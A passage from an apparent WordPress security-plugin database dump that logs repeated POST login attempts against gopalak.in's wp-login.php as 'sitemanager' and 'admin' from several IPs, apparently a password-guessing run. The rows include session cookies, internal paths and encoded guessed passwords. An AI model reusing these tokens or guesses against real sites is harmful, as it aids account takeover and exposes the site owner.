Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33846\";s:11:\"REMOTE_ADDR\";s:14:\"103.13.112.160\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399601.069957;s:12:\"REQUEST_TIME\";i:1745399601;}}','103.13.112.160',0,'2025-04-23 14:43:22','1970-01-01 00:00:00'),(93875,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7cGF0cmljaWE%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399630.403187;s:12:\"REQUEST_TIME\";i:1745399630;}}','170.64.166.21',1,'2025-04-23 14:43:52','2025-04-24 14:43:59'),(93876,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"77\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7YWFhYWFhYWE%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"77\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399632.184413;s:12:\"REQUEST_TIME\";i:1745399632;}}','170.64.166.21',1,'2025-04-23 14:43:53','2025-04-24 14:43:59'),(93877,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7MTk2OQ%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399633.9808459;s:12:\"REQUEST_TIME\";i:1745399633;}}','170.64.166.21',1,'2025-04-23 14:43:55','2025-04-24 14:43:59'),(93878,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7dGVyZXNh\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399635.7716861;s:12:\"REQUEST_TIME\";i:1745399635;}}','170.64.166.21',1,'2025-04-23 14:43:57','2025-04-24 14:43:59'),(93879,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gIqohXzUglA1I/Ag==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=H8ELzBKxjq9cYjmLa8SDaObS1FtESEOE; PHPSESSID=fa980bbc67df8b531b378a1fe58a9568; swpm_session=823ca6faf868142187dddbf2094d0f45; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7bW96YXJ0\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54719\";s:11:\"REMOTE_ADDR\";s:13:\"170.64.166.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399637.558485;s:12:\"REQUEST_TIME\";i:1745399637;}}','170.64.166.21',1,'2025-04-23 14:43:59','2025-04-24 14:43:59'),(93880,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33660\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745399992.8857601;s:12:\"REQUEST_TIME\";i:1745399992;}}','198.54.114.37',0,'2025-04-23 14:49:54','1970-01-01 00:00:00'),(93881,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40374\";s:11:\"REMOTE_ADDR\";s:13:\"67.205.59.102\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745400385.446605;s:12:\"REQUEST_TIME\";i:1745400385;}}','67.205.59.102',0,'2025-04-23 14:56:27','1970-01-01 00:00:00'),(93882,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36586\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.220.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745400778.313586;s:12:\"REQUEST_TIME\";i:1745400778;}}','68.66.220.30',0,'2025-04-23 15:02:59','1970-01-01 00:00:00'),(93883,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48736\";s:11:\"REMOTE_ADDR\";s:12:\"176.74.26.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745401171.60075;s:12:\"REQUEST_TIME\";i:1745401171;}}','176.74.26.54',0,'2025-04-23 15:09:33','1970-01-01 00:00:00'),(93884,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 